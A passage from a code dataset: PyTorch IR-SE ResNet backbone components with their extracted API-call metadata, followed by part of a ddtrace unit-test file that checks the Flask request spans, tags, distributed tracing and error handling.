axis=1):\n \"\"\"l2 normalization.\n\n Args:\n input (torch.Tensor): The input tensor.\n axis (int, optional): Specifies which axis of input to calculate the\n norm across. Defaults to 1.\n\n Returns:\n Tensor: Tensor after L2 normalization per-instance.\n \"\"\"\n norm = torch.norm(input, 2, axis, True)\n output = torch.div(input, norm)\n return output\n\n\nclass Bottleneck(namedtuple('Block', ['in_channel', 'depth', 'stride'])):\n \"\"\"A named tuple describing a ResNet block.\"\"\"\n\n\ndef get_block(in_channel, depth, num_units, stride=2):\n \"\"\"Get a single block config.\n\n Args:\n in_channel (int): Input channels.\n depth (int): Output channels.\n num_units (int): Number of unit modules.\n stride (int, optional): Conv2d stride. Defaults to 2.\n\n Returns:\n list: A list of unit modules' config.\n \"\"\"\n return [Bottleneck(in_channel, depth, stride)\n ] + [Bottleneck(depth, depth, 1) for i in range(num_units - 1)]\n\n\ndef get_blocks(num_layers):\n \"\"\"Get block configs of backbone.\n\n Args:\n num_layers (int): Number of ConvBlock layers in backbone.\n\n Raises:\n ValueError: `num_layers` must be one of [50, 100, 152].\n\n Returns:\n list: A list of block configs.\n \"\"\"\n if num_layers == 50:\n blocks = [\n get_block(in_channel=64, depth=64, num_units=3),\n get_block(in_channel=64, depth=128, num_units=4),\n get_block(in_channel=128, depth=256, num_units=14),\n get_block(in_channel=256, depth=512, num_units=3)\n ]\n elif num_layers == 100:\n blocks = [\n get_block(in_channel=64, depth=64, num_units=3),\n get_block(in_channel=64, depth=128, num_units=13),\n get_block(in_channel=128, depth=256, num_units=30),\n get_block(in_channel=256, depth=512, num_units=3)\n ]\n elif num_layers == 152:\n blocks = [\n get_block(in_channel=64, depth=64, num_units=3),\n get_block(in_channel=64, depth=128, num_units=8),\n get_block(in_channel=128, depth=256, num_units=36),\n get_block(in_channel=256, depth=512, num_units=3)\n ]\n else:\n raise ValueError(\n 'Invalid number of layers: {}. Must be one of [50, 100, 152]'.\n format(num_layers))\n return blocks\n\n\nclass SEModule(Module):\n \"\"\"Squeeze-and-Excitation Modules.\n\n Args:\n channels (int): Input channels.\n reduction (int): Intermediate channels reduction ratio.\n \"\"\"\n\n def __init__(self, channels, reduction):\n super(SEModule, self).__init__()\n self.avg_pool = AdaptiveAvgPool2d(1)\n self.fc1 = Conv2d(\n channels,\n channels // reduction,\n kernel_size=1,\n padding=0,\n bias=False)\n self.relu = ReLU(inplace=True)\n self.fc2 = Conv2d(\n channels // reduction,\n channels,\n kernel_size=1,\n padding=0,\n bias=False)\n self.sigmoid = Sigmoid()\n\n def forward(self, x):\n \"\"\"Forward Function.\"\"\"\n module_input = x\n x = self.avg_pool(x)\n x = self.fc1(x)\n x = self.relu(x)\n x = self.fc2(x)\n x = self.sigmoid(x)\n return module_input * x\n\n\nclass bottleneck_IR(Module):\n \"\"\"Intermediate Resblock of bottleneck.\n\n Args:\n in_channel (int): Input channels.\n depth (int): Output channels.\n stride (int): Conv2d stride.\n \"\"\"\n\n def __init__(self, in_channel, depth, stride):\n \"\"\"Intermediate Resblock of bottleneck.\n\n Args:\n in_channel (int): Input channels.\n depth (int): Output channels.\n stride (int): Conv2d stride.\n \"\"\"\n super(bottleneck_IR, self).__init__()\n if in_channel == depth:\n self.shortcut_layer = MaxPool2d(1, stride)\n else:\n self.shortcut_layer = Sequential(\n Conv2d(in_channel, depth, (1, 1), stride, bias=False),\n BatchNorm2d(depth))\n self.res_layer = Sequential(\n BatchNorm2d(in_channel),\n Conv2d(in_channel, depth, (3, 3), (1, 1), 1, bias=False),\n PReLU(depth), Conv2d(depth, depth, (3, 3), stride, 1, bias=False),\n BatchNorm2d(depth))\n\n def forward(self, x):\n \"\"\"Forward function.\"\"\"\n shortcut = self.shortcut_layer(x)\n res = self.res_layer(x)\n return res + shortcut\n\n\nclass bottleneck_IR_SE(Module):\n \"\"\"Intermediate Resblock of bottleneck with SEModule.\n\n Args:\n in_channel (int): Input channels.\n depth (int): Output channels.\n stride (int): Conv2d stride.\n \"\"\"\n\n def __init__(self, in_channel, depth, stride):\n super(bottleneck_IR_SE, self).__init__()\n if in_channel == depth:\n self.shortcut_layer = MaxPool2d(1, stride)\n else:\n self.shortcut_layer = Sequential(\n Conv2d(in_channel, depth, (1, 1), stride, bias=False),\n BatchNorm2d(depth))\n self.res_layer = Sequential(\n BatchNorm2d(in_channel),\n Conv2d(in_channel, depth, (3, 3), (1, 1), 1, bias=False),\n PReLU(depth), Conv2d(depth, depth, (3, 3), stride, 1, bias=False),\n BatchNorm2d(depth), SEModule(depth, 16))\n\n def forward(self, x):\n \"\"\"Forward function.\"\"\"\n shortcut = self.shortcut_layer(x)\n res = self.res_layer(x)\n return res + shortcut\n"},"apis":{"kind":"list like","value":["torch.nn.Sigmoid","torch.nn.ReLU","collections.namedtuple","torch.nn.BatchNorm2d","torch.nn.Conv2d","torch.nn.PReLU","torch.norm","torch.nn.MaxPool2d","torch.nn.AdaptiveAvgPool2d","torch.div"],"string":"[\n \"torch.nn.Sigmoid\",\n \"torch.nn.ReLU\",\n \"collections.namedtuple\",\n \"torch.nn.BatchNorm2d\",\n \"torch.nn.Conv2d\",\n \"torch.nn.PReLU\",\n \"torch.norm\",\n \"torch.nn.MaxPool2d\",\n \"torch.nn.AdaptiveAvgPool2d\",\n \"torch.div\"\n]"},"extract_api":{"kind":"string","value":"[((890, 944), 'collections.namedtuple', 'namedtuple', (['\"\"\"Block\"\"\"', \"['in_channel', 'depth', 'stride']\"], {}), \"('Block', ['in_channel', 'depth', 'stride'])\\n\", (900, 944), False, 'from collections import namedtuple\\n'), ((784, 816), 'torch.norm', 'torch.norm', (['input', '(2)', 'axis', '(True)'], {}), '(input, 2, axis, True)\\n', (794, 816), False, 'import torch\\n'), ((830, 852), 'torch.div', 'torch.div', (['input', 'norm'], {}), '(input, norm)\\n', (839, 852), False, 'import torch\\n'), ((3144, 3164), 'torch.nn.AdaptiveAvgPool2d', 'AdaptiveAvgPool2d', (['(1)'], {}), '(1)\\n', (3161, 3164), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((3184, 3261), 'torch.nn.Conv2d', 'Conv2d', (['channels', '(channels // reduction)'], {'kernel_size': '(1)', 'padding': '(0)', 'bias': '(False)'}), '(channels, channels // reduction, kernel_size=1, padding=0, bias=False)\\n', (3190, 3261), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((3343, 3361), 'torch.nn.ReLU', 'ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\\n', (3347, 3361), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((3381, 3458), 'torch.nn.Conv2d', 'Conv2d', (['(channels // reduction)', 'channels'], {'kernel_size': '(1)', 'padding': '(0)', 'bias': '(False)'}), '(channels // reduction, channels, kernel_size=1, padding=0, bias=False)\\n', (3387, 3458), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((3543, 3552), 'torch.nn.Sigmoid', 'Sigmoid', ([], {}), '()\\n', (3550, 3552), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((4378, 4398), 'torch.nn.MaxPool2d', 'MaxPool2d', (['(1)', 'stride'], {}), '(1, stride)\\n', (4387, 4398), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((4615, 4638), 'torch.nn.BatchNorm2d', 'BatchNorm2d', (['in_channel'], {}), '(in_channel)\\n', (4626, 4638), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((4652, 4708), 'torch.nn.Conv2d', 'Conv2d', (['in_channel', 'depth', '(3, 3)', '(1, 1)', '(1)'], {'bias': '(False)'}), '(in_channel, depth, (3, 3), (1, 1), 1, bias=False)\\n', (4658, 4708), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((4722, 4734), 'torch.nn.PReLU', 'PReLU', (['depth'], {}), '(depth)\\n', (4727, 4734), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((4736, 4787), 'torch.nn.Conv2d', 'Conv2d', (['depth', 'depth', '(3, 3)', 'stride', '(1)'], {'bias': '(False)'}), '(depth, depth, (3, 3), stride, 1, bias=False)\\n', (4742, 4787), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((4801, 4819), 'torch.nn.BatchNorm2d', 'BatchNorm2d', (['depth'], {}), '(depth)\\n', (4812, 4819), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((5379, 5399), 'torch.nn.MaxPool2d', 'MaxPool2d', (['(1)', 'stride'], {}), '(1, stride)\\n', (5388, 5399), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((5616, 5639), 'torch.nn.BatchNorm2d', 'BatchNorm2d', (['in_channel'], {}), '(in_channel)\\n', (5627, 5639), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((5653, 5709), 'torch.nn.Conv2d', 'Conv2d', (['in_channel', 'depth', '(3, 3)', '(1, 1)', '(1)'], {'bias': '(False)'}), '(in_channel, depth, (3, 3), (1, 1), 1, bias=False)\\n', (5659, 5709), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((5723, 5735), 'torch.nn.PReLU', 'PReLU', (['depth'], {}), '(depth)\\n', (5728, 5735), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((5737, 5788), 'torch.nn.Conv2d', 'Conv2d', (['depth', 'depth', '(3, 3)', 'stride', '(1)'], {'bias': '(False)'}), '(depth, depth, (3, 3), stride, 1, bias=False)\\n', (5743, 5788), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((5802, 5820), 'torch.nn.BatchNorm2d', 'BatchNorm2d', (['depth'], {}), '(depth)\\n', (5813, 5820), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((4475, 4528), 'torch.nn.Conv2d', 'Conv2d', (['in_channel', 'depth', '(1, 1)', 'stride'], {'bias': '(False)'}), '(in_channel, depth, (1, 1), stride, bias=False)\\n', (4481, 4528), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((4546, 4564), 'torch.nn.BatchNorm2d', 'BatchNorm2d', (['depth'], {}), '(depth)\\n', (4557, 4564), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((5476, 5529), 'torch.nn.Conv2d', 'Conv2d', (['in_channel', 'depth', '(1, 1)', 'stride'], {'bias': '(False)'}), '(in_channel, depth, (1, 1), stride, bias=False)\\n', (5482, 5529), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n'), ((5547, 5565), 'torch.nn.BatchNorm2d', 'BatchNorm2d', (['depth'], {}), '(depth)\\n', (5558, 5565), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n')]"}}},{"rowIdx":762,"cells":{"code":{"kind":"string","value":"# -*- coding: utf-8 -*-\nfrom ddtrace.compat import PY2\nfrom ddtrace.constants import ANALYTICS_SAMPLE_RATE_KEY\nfrom ddtrace.contrib.flask.patch import flask_version\nfrom ddtrace.ext import http\nfrom ddtrace.propagation.http import HTTP_HEADER_TRACE_ID, HTTP_HEADER_PARENT_ID\nfrom flask import abort\n\nfrom . import BaseFlaskTestCase\nfrom ...utils import assert_span_http_status_code\n\n\nbase_exception_name = 'builtins.Exception'\nif PY2:\n base_exception_name = 'exceptions.Exception'\n\n\nclass FlaskRequestTestCase(BaseFlaskTestCase):\n def test_request(self):\n \"\"\"\n When making a request\n We create the expected spans\n \"\"\"\n @self.app.route('/')\n def index():\n return 'Hello Flask', 200\n\n res = self.client.get('/')\n self.assertEqual(res.status_code, 200)\n self.assertEqual(res.data, b'Hello Flask')\n\n spans = self.get_spans()\n self.assertEqual(len(spans), 8)\n\n # Assert the order of the spans created\n self.assertListEqual(\n [\n 'flask.request',\n 'flask.try_trigger_before_first_request_functions',\n 'flask.preprocess_request',\n 'flask.dispatch_request',\n 'tests.contrib.flask.test_request.index',\n 'flask.process_response',\n 'flask.do_teardown_request',\n 'flask.do_teardown_appcontext',\n ],\n [s.name for s in spans],\n )\n\n # Assert span services\n for span in spans:\n self.assertEqual(span.service, 'flask')\n\n # Root request span\n req_span = spans[0]\n self.assertEqual(req_span.service, 'flask')\n self.assertEqual(req_span.name, 'flask.request')\n self.assertEqual(req_span.resource, 'GET /')\n self.assertEqual(req_span.span_type, 'web')\n self.assertEqual(req_span.error, 0)\n self.assertIsNone(req_span.parent_id)\n\n # Request tags\n self.assertEqual(req_span.get_tag('flask.endpoint'), 'index')\n self.assertEqual(req_span.get_tag('flask.url_rule'), '/')\n self.assertEqual(req_span.get_tag('http.method'), 'GET')\n self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/')\n assert_span_http_status_code(req_span, 200)\n assert http.QUERY_STRING not in req_span.meta\n\n # Handler span\n handler_span = spans[4]\n self.assertEqual(handler_span.service, 'flask')\n self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.index')\n self.assertEqual(handler_span.resource, '/')\n self.assertEqual(req_span.error, 0)\n\n def test_request_query_string_trace(self):\n \"\"\"Make sure when making a request that we create the expected spans and capture the query string.\"\"\"\n @self.app.route('/')\n def index():\n return 'Hello Flask', 200\n\n with self.override_http_config('flask', dict(trace_query_string=True)):\n self.client.get('/?foo=bar&baz=biz')\n spans = self.get_spans()\n\n # Request tags\n assert spans[0].get_tag(http.QUERY_STRING) == 'foo=bar&baz=biz'\n\n def test_analytics_global_on_integration_default(self):\n \"\"\"\n When making a request\n When an integration trace search is not event sample rate is not set and globally trace search is enabled\n We expect the root span to have the appropriate tag\n \"\"\"\n @self.app.route('/')\n def index():\n return 'Hello Flask', 200\n\n with self.override_global_config(dict(analytics_enabled=True)):\n res = self.client.get('/')\n self.assertEqual(res.status_code, 200)\n self.assertEqual(res.data, b'Hello Flask')\n\n root = self.get_root_span()\n root.assert_matches(\n name='flask.request',\n metrics={\n ANALYTICS_SAMPLE_RATE_KEY: 1.0,\n },\n )\n\n for span in self.spans:\n if span == root:\n continue\n self.assertIsNone(span.get_metric(ANALYTICS_SAMPLE_RATE_KEY))\n\n def test_analytics_global_on_integration_on(self):\n \"\"\"\n When making a request\n When an integration trace search is enabled and sample rate is set and globally trace search is enabled\n We expect the root span to have the appropriate tag\n \"\"\"\n @self.app.route('/')\n def index():\n return 'Hello Flask', 200\n\n with self.override_global_config(dict(analytics_enabled=True)):\n with self.override_config('flask', dict(analytics_enabled=True, analytics_sample_rate=0.5)):\n res = self.client.get('/')\n self.assertEqual(res.status_code, 200)\n self.assertEqual(res.data, b'Hello Flask')\n\n root = self.get_root_span()\n root.assert_matches(\n name='flask.request',\n metrics={\n ANALYTICS_SAMPLE_RATE_KEY: 0.5,\n },\n )\n\n for span in self.spans:\n if span == root:\n continue\n self.assertIsNone(span.get_metric(ANALYTICS_SAMPLE_RATE_KEY))\n\n def test_analytics_global_off_integration_default(self):\n \"\"\"\n When making a request\n When an integration trace search is not set and sample rate is set and globally trace search is disabled\n We expect the root span to not include tag\n \"\"\"\n @self.app.route('/')\n def index():\n return 'Hello Flask', 200\n\n with self.override_global_config(dict(analytics_enabled=False)):\n res = self.client.get('/')\n self.assertEqual(res.status_code, 200)\n self.assertEqual(res.data, b'Hello Flask')\n\n root = self.get_root_span()\n self.assertIsNone(root.get_metric(ANALYTICS_SAMPLE_RATE_KEY))\n\n for span in self.spans:\n if span == root:\n continue\n self.assertIsNone(span.get_metric(ANALYTICS_SAMPLE_RATE_KEY))\n\n def test_analytics_global_off_integration_on(self):\n \"\"\"\n When making a request\n When an integration trace search is enabled and sample rate is set and globally trace search is disabled\n We expect the root span to have the appropriate tag\n \"\"\"\n @self.app.route('/')\n def index():\n return 'Hello Flask', 200\n\n with self.override_global_config(dict(analytics_enabled=False)):\n with self.override_config('flask', dict(analytics_enabled=True, analytics_sample_rate=0.5)):\n res = self.client.get('/')\n self.assertEqual(res.status_code, 200)\n self.assertEqual(res.data, b'Hello Flask')\n root = self.get_root_span()\n root.assert_matches(\n name='flask.request',\n metrics={\n ANALYTICS_SAMPLE_RATE_KEY: 0.5,\n },\n )\n\n for span in self.spans:\n if span == root:\n continue\n self.assertIsNone(span.get_metric(ANALYTICS_SAMPLE_RATE_KEY))\n\n def test_distributed_tracing(self):\n \"\"\"\n When making a request\n When distributed tracing headers are present\n We create the expected spans\n \"\"\"\n @self.app.route('/')\n def index():\n return 'Hello Flask', 200\n\n # Default: distributed tracing enabled\n res = self.client.get('/', headers={\n HTTP_HEADER_PARENT_ID: '12345',\n HTTP_HEADER_TRACE_ID: '678910',\n })\n self.assertEqual(res.status_code, 200)\n self.assertEqual(res.data, b'Hello Flask')\n\n # Assert parent and trace id are properly set on the root span\n span = self.find_span_by_name(self.get_spans(), 'flask.request')\n self.assertEqual(span.trace_id, 678910)\n self.assertEqual(span.parent_id, 12345)\n\n # Explicitly enable distributed tracing\n with self.override_config('flask', dict(distributed_tracing_enabled=True)):\n res = self.client.get('/', headers={\n HTTP_HEADER_PARENT_ID: '12345',\n HTTP_HEADER_TRACE_ID: '678910',\n })\n self.assertEqual(res.status_code, 200)\n self.assertEqual(res.data, b'Hello Flask')\n\n # Assert parent and trace id are properly set on the root span\n span = self.find_span_by_name(self.get_spans(), 'flask.request')\n self.assertEqual(span.trace_id, 678910)\n self.assertEqual(span.parent_id, 12345)\n\n # With distributed tracing disabled\n with self.override_config('flask', dict(distributed_tracing_enabled=False)):\n res = self.client.get('/', headers={\n HTTP_HEADER_PARENT_ID: '12345',\n HTTP_HEADER_TRACE_ID: '678910',\n })\n self.assertEqual(res.status_code, 200)\n self.assertEqual(res.data, b'Hello Flask')\n\n # Assert parent and trace id are properly set on the root span\n span = self.find_span_by_name(self.get_spans(), 'flask.request')\n self.assertNotEqual(span.trace_id, 678910)\n self.assertIsNone(span.parent_id)\n\n def test_request_query_string(self):\n \"\"\"\n When making a request\n When the request contains a query string\n We create the expected spans\n \"\"\"\n @self.app.route('/')\n def index():\n return 'Hello Flask', 200\n\n res = self.client.get('/', query_string=dict(hello='flask'))\n self.assertEqual(res.status_code, 200)\n self.assertEqual(res.data, b'Hello Flask')\n\n spans = self.get_spans()\n self.assertEqual(len(spans), 8)\n\n # Assert the order of the spans created\n self.assertListEqual(\n [\n 'flask.request',\n 'flask.try_trigger_before_first_request_functions',\n 'flask.preprocess_request',\n 'flask.dispatch_request',\n 'tests.contrib.flask.test_request.index',\n 'flask.process_response',\n 'flask.do_teardown_request',\n 'flask.do_teardown_appcontext',\n ],\n [s.name for s in spans],\n )\n\n # Assert span services\n for span in spans:\n self.assertEqual(span.service, 'flask')\n\n # Root request span\n req_span = spans[0]\n self.assertEqual(req_span.service, 'flask')\n self.assertEqual(req_span.name, 'flask.request')\n # Note: contains no query string\n self.assertEqual(req_span.resource, 'GET /')\n self.assertEqual(req_span.span_type, 'web')\n self.assertEqual(req_span.error, 0)\n self.assertIsNone(req_span.parent_id)\n\n # Request tags\n self.assertEqual(req_span.get_tag('flask.endpoint'), 'index')\n # Note: contains no query string\n self.assertEqual(req_span.get_tag('flask.url_rule'), '/')\n self.assertEqual(req_span.get_tag('http.method'), 'GET')\n # Note: contains no query string\n self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/')\n assert_span_http_status_code(req_span, 200)\n\n # Handler span\n handler_span = spans[4]\n self.assertEqual(handler_span.service, 'flask')\n self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.index')\n # Note: contains no query string\n self.assertEqual(handler_span.resource, '/')\n self.assertEqual(req_span.error, 0)\n\n def test_request_unicode(self):\n \"\"\"\n When making a request\n When the url contains unicode\n We create the expected spans\n \"\"\"\n @self.app.route(u'/üŋïĉóđē')\n def unicode():\n return 'üŋïĉóđē', 200\n\n res = self.client.get(u'/üŋïĉóđē')\n self.assertEqual(res.status_code, 200)\n self.assertEqual(res.data, b'\\xc3\\xbc\\xc5\\x8b\\xc3\\xaf\\xc4\\x89\\xc3\\xb3\\xc4\\x91\\xc4\\x93')\n\n spans = self.get_spans()\n self.assertEqual(len(spans), 8)\n\n # Assert the order of the spans created\n self.assertListEqual(\n [\n 'flask.request',\n 'flask.try_trigger_before_first_request_functions',\n 'flask.preprocess_request',\n 'flask.dispatch_request',\n 'tests.contrib.flask.test_request.unicode',\n 'flask.process_response',\n 'flask.do_teardown_request',\n 'flask.do_teardown_appcontext',\n ],\n [s.name for s in spans],\n )\n\n # Assert span services\n for span in spans:\n self.assertEqual(span.service, 'flask')\n\n # Root request span\n req_span = spans[0]\n self.assertEqual(req_span.service, 'flask')\n self.assertEqual(req_span.name, 'flask.request')\n self.assertEqual(req_span.resource, u'GET /üŋïĉóđē')\n self.assertEqual(req_span.span_type, 'web')\n self.assertEqual(req_span.error, 0)\n self.assertIsNone(req_span.parent_id)\n\n # Request tags\n self.assertEqual(req_span.get_tag('flask.endpoint'), 'unicode')\n self.assertEqual(req_span.get_tag('flask.url_rule'), u'/üŋïĉóđē')\n self.assertEqual(req_span.get_tag('http.method'), 'GET')\n self.assertEqual(req_span.get_tag(http.URL), u'http://localhost/üŋïĉóđē')\n assert_span_http_status_code(req_span, 200)\n\n # Handler span\n handler_span = spans[4]\n self.assertEqual(handler_span.service, 'flask')\n self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.unicode')\n self.assertEqual(handler_span.resource, u'/üŋïĉóđē')\n self.assertEqual(req_span.error, 0)\n\n def test_request_404(self):\n \"\"\"\n When making a request\n When the requested endpoint was not found\n We create the expected spans\n \"\"\"\n res = self.client.get('/not-found')\n self.assertEqual(res.status_code, 404)\n\n spans = self.get_spans()\n self.assertEqual(len(spans), 9)\n\n # Assert the order of the spans created\n self.assertListEqual(\n [\n 'flask.request',\n 'flask.try_trigger_before_first_request_functions',\n 'flask.preprocess_request',\n 'flask.dispatch_request',\n 'flask.handle_user_exception',\n 'flask.handle_http_exception',\n 'flask.process_response',\n 'flask.do_teardown_request',\n 'flask.do_teardown_appcontext',\n ],\n [s.name for s in spans],\n )\n\n # Assert span services\n for span in spans:\n self.assertEqual(span.service, 'flask')\n\n # Root request span\n req_span = spans[0]\n self.assertEqual(req_span.service, 'flask')\n self.assertEqual(req_span.name, 'flask.request')\n self.assertEqual(req_span.resource, 'GET 404')\n self.assertEqual(req_span.span_type, 'web')\n self.assertEqual(req_span.error, 0)\n self.assertIsNone(req_span.parent_id)\n\n # Request tags\n self.assertEqual(req_span.get_tag('http.method'), 'GET')\n self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/not-found')\n assert_span_http_status_code(req_span, 404)\n\n # Dispatch span\n dispatch_span = spans[3]\n self.assertEqual(dispatch_span.service, 'flask')\n self.assertEqual(dispatch_span.name, 'flask.dispatch_request')\n self.assertEqual(dispatch_span.resource, 'flask.dispatch_request')\n self.assertEqual(dispatch_span.error, 1)\n self.assertTrue(dispatch_span.get_tag('error.msg').startswith('404 Not Found'))\n self.assertTrue(dispatch_span.get_tag('error.stack').startswith('Traceback'))\n self.assertEqual(dispatch_span.get_tag('error.type'), 'werkzeug.exceptions.NotFound')\n\n def test_request_abort_404(self):\n \"\"\"\n When making a request\n When the requested endpoint calls `abort(404)`\n We create the expected spans\n \"\"\"\n @self.app.route('/not-found')\n def not_found():\n abort(404)\n\n res = self.client.get('/not-found')\n self.assertEqual(res.status_code, 404)\n\n spans = self.get_spans()\n self.assertEqual(len(spans), 10)\n\n # Assert the order of the spans created\n self.assertListEqual(\n [\n 'flask.request',\n 'flask.try_trigger_before_first_request_functions',\n 'flask.preprocess_request',\n 'flask.dispatch_request',\n 'tests.contrib.flask.test_request.not_found',\n 'flask.handle_user_exception',\n 'flask.handle_http_exception',\n 'flask.process_response',\n 'flask.do_teardown_request',\n 'flask.do_teardown_appcontext',\n ],\n [s.name for s in spans],\n )\n\n # Assert span services\n for span in spans:\n self.assertEqual(span.service, 'flask')\n\n # Root request span\n req_span = spans[0]\n self.assertEqual(req_span.service, 'flask')\n self.assertEqual(req_span.name, 'flask.request')\n self.assertEqual(req_span.resource, 'GET /not-found')\n self.assertEqual(req_span.span_type, 'web')\n self.assertEqual(req_span.error, 0)\n self.assertIsNone(req_span.parent_id)\n\n # Request tags\n self.assertEqual(req_span.get_tag('http.method'), 'GET')\n self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/not-found')\n assert_span_http_status_code(req_span, 404)\n self.assertEqual(req_span.get_tag('flask.endpoint'), 'not_found')\n self.assertEqual(req_span.get_tag('flask.url_rule'), '/not-found')\n\n # Dispatch span\n dispatch_span = spans[3]\n self.assertEqual(dispatch_span.service, 'flask')\n self.assertEqual(dispatch_span.name, 'flask.dispatch_request')\n self.assertEqual(dispatch_span.resource, 'flask.dispatch_request')\n self.assertEqual(dispatch_span.error, 1)\n self.assertTrue(dispatch_span.get_tag('error.msg').startswith('404 Not Found'))\n self.assertTrue(dispatch_span.get_tag('error.stack').startswith('Traceback'))\n self.assertEqual(dispatch_span.get_tag('error.type'), 'werkzeug.exceptions.NotFound')\n\n # Handler span\n handler_span = spans[4]\n self.assertEqual(handler_span.service, 'flask')\n self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.not_found')\n self.assertEqual(handler_span.resource, '/not-found')\n self.assertEqual(handler_span.error, 1)\n self.assertTrue(handler_span.get_tag('error.msg').startswith('404 Not Found'))\n self.assertTrue(handler_span.get_tag('error.stack').startswith('Traceback'))\n self.assertEqual(handler_span.get_tag('error.type'), 'werkzeug.exceptions.NotFound')\n\n def test_request_500(self):\n \"\"\"\n When making a request\n When the requested endpoint raises an exception\n We create the expected spans\n \"\"\"\n @self.app.route('/500')\n def fivehundred():\n raise Exception('500 error')\n\n res = self.client.get('/500')\n self.assertEqual(res.status_code, 500)\n\n spans = self.get_spans()\n self.assertEqual(len(spans), 9)\n\n # Assert the order of the spans created\n self.assertListEqual(\n [\n 'flask.request',\n 'flask.try_trigger_before_first_request_functions',\n 'flask.preprocess_request',\n 'flask.dispatch_request',\n 'tests.contrib.flask.test_request.fivehundred',\n 'flask.handle_user_exception',\n 'flask.handle_exception',\n 'flask.do_teardown_request',\n 'flask.do_teardown_appcontext',\n ],\n [s.name for s in spans],\n )\n\n # Assert span services\n for span in spans:\n self.assertEqual(span.service, 'flask')\n\n # Root request span\n req_span = spans[0]\n self.assertEqual(req_span.service, 'flask')\n self.assertEqual(req_span.name, 'flask.request')\n self.assertEqual(req_span.resource, 'GET /500')\n self.assertEqual(req_span.span_type, 'web')\n self.assertEqual(req_span.error, 1)\n self.assertIsNone(req_span.parent_id)\n\n # Request tags\n self.assertEqual(req_span.get_tag('http.method'), 'GET')\n self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/500')\n assert_span_http_status_code(req_span, 500)\n self.assertEqual(req_span.get_tag('flask.endpoint'), 'fivehundred')\n self.assertEqual(req_span.get_tag('flask.url_rule'), '/500')\n\n # Dispatch span\n dispatch_span = spans[3]\n self.assertEqual(dispatch_span.service, 'flask')\n self.assertEqual(dispatch_span.name, 'flask.dispatch_request')\n self.assertEqual(dispatch_span.resource, 'flask.dispatch_request')\n self.assertEqual(dispatch_span.error, 1)\n self.assertTrue(dispatch_span.get_tag('error.msg').startswith('500 error'))\n self.assertTrue(dispatch_span.get_tag('error.stack').startswith('Traceback'))\n self.assertEqual(dispatch_span.get_tag('error.type'), base_exception_name)\n\n # Handler span\n handler_span = spans[4]\n self.assertEqual(handler_span.service, 'flask')\n self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.fivehundred')\n self.assertEqual(handler_span.resource, '/500')\n self.assertEqual(handler_span.error, 1)\n self.assertTrue(handler_span.get_tag('error.msg').startswith('500 error'))\n self.assertTrue(handler_span.get_tag('error.stack').startswith('Traceback'))\n self.assertEqual(handler_span.get_tag('error.type'), base_exception_name)\n\n # User exception span\n user_ex_span = spans[5]\n self.assertEqual(user_ex_span.service, 'flask')\n self.assertEqual(user_ex_span.name, 'flask.handle_user_exception')\n self.assertEqual(user_ex_span.resource, 'flask.handle_user_exception')\n self.assertEqual(user_ex_span.error, 1)\n 